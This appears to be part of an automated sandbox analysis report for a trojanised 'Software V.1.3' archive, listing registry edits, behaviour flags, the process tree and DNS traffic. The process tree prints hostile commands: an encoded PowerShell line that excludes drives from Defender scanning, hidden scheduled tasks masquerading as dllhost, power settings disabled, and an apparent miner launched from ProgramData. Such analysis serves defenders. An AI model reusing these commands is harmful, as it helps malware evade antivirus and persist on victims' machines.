| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 177400.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Software V.1.3.rar"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffce7d346f8,0x7ffce7d34708,0x7ffce7d34718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4712 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18199888230039434625,6017291462580300654,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:8
C:\Users\Admin\Downloads\7z2407-x64.exe
"C:\Users\Admin\Downloads\7z2407-x64.exe"
C:\Users\Admin\Downloads\7z2407-x64.exe
"C:\Users\Admin\Downloads\7z2407-x64.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\Software V.1.3.rar"
C:\Users\Admin\Desktop\Software V.1.3\Software V.1.3.exe
"C:\Users\Admin\Desktop\Software V.1.3\Software V.1.3.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\conhost.exe
"C:\Users\Admin\AppData\Local\Temp\conhost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1404753551733818025492326517 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
"Installer.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAHAATQBNAG4AYQAwADEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AE4AbABKADEAZQBOACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAE4AMQBzAFkASgAzAFoAcAA1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAQwBoAFIARABoAGUATABvACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHAATQBNAG4AYQAwADEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AE4AbABKADEAZQBOACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAE4AMQBzAFkASgAzAFoAcAA1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAQwBoAFIARABoAGUATABvACMAPgA="
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5511" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5511" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\powercfg.exe
powercfg /hibernate off
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap30941:78:7zEvent18682 -ad -saa -- "C:\Users\Admin\Desktop\Software V.1.3"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap8734:78:7zEvent18249 -ad -saa -- "C:\Users\Admin\Desktop\Software V.1.3"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcef7846f8,0x7ffcef784708,0x7ffcef784718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3792 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap18420:78:7zEvent4151 -ad -saa -- "C:\Users\Admin\Desktop\Software V.1.3"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2740 /prefetch:8
C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,4799973663693015180,18352204955655861199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1360 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe -c config.json
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| GB | 95.101.143.219:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 219.143.101.95.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| DE | 49.12.202.237:80 | www.7-zip.org | tcp |
| DE | 49.12.202.237:80 | www.7-zip.org | tcp |
| US | 8.8.8.8:53 | 7-zip.org | udp |
